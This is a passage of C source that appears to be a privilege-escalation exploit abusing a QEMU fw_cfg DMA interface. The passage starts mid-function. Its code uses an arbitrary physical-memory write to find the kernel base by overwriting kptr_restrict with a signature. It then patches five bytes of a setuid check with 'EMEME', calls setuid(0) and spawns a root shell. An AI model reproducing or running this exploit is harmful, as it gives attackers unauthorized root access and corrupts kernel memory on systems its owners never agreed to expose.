    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);

    //
    // DMA transfer of `size` bytes
    //
    cmd_physaddr = sp0_get_cmd(fw_ctl_read | (FW_CFG_SIGNATURE << 16), phys_addr, size);

    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    if (cmd_physaddr_hi)
        outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);

    return 1;
}

// Reads the integer currently exposed by the KPTR_RESTRICT procfs file.
// Returns that value, or 0 when the file cannot be opened or parsed.
uint32_t check_kptr_restrict(){
    unsigned int level = 0;
    FILE* f = fopen(KPTR_RESTRICT, "rb");

    if (f == NULL)
        return 0;

    // %u matches the unsigned destination; it also accepts a leading '-',
    // so a value the kernel prints as negative still reads back as non-zero.
    if (fscanf(f, "%u", &level) != 1)
        level = 0;

    fclose(f);
    return level;
}

// Runs the signature-based variant end to end.
//
// 1. Walks candidate physical kernel bases downwards, writing the signature
//    bytes to (base + KPTR_RESTRICT_OFFSET) and stopping once
//    check_kptr_restrict() reads back a non-zero value. This assumes
//    kptr_restrict is 0 beforehand.
// 2. Overwrites five bytes at (base + SETUID_CHECK) with "EMEME", one byte per
//    arbw() call.
// 3. Calls setuid(0) and starts /bin/sh.
//
// Returns without patching anything when no candidate base matched.
void fw_cfg() {
    char patch[] = "EMEME";
    uint64_t phys_kbase;
    int located = 0;

    for (phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x1000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
        arbw(phys_kbase + KPTR_RESTRICT_OFFSET, SIGNATURE, sizeof(SIGNATURE));
        if(check_kptr_restrict() != 0){
            located = 1;
            break;
        }
    }

    // After an exhausted search phys_kbase is below the lowest candidate;
    // patching relative to it would write to unrelated memory.
    if (!located) {
        puts("phys kbase not found");
        return;
    }
    printf("phys kbase @ %p\n", (void *)(uintptr_t)phys_kbase);

    // sizeof(patch) - 1: the terminating NUL is not written
    for (size_t i = 0; i < sizeof(patch) - 1; ++i)
        arbw(phys_kbase + SETUID_CHECK + i, &patch[i], 1);

    if (setuid(0) != 0)
        perror("setuid");
    system("/bin/sh");
}

int main() {   
    // ioperm(0, 0xffff, 1);

    struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    fw_cfg();
	

    hlt("finished");
    return 0;
}
```
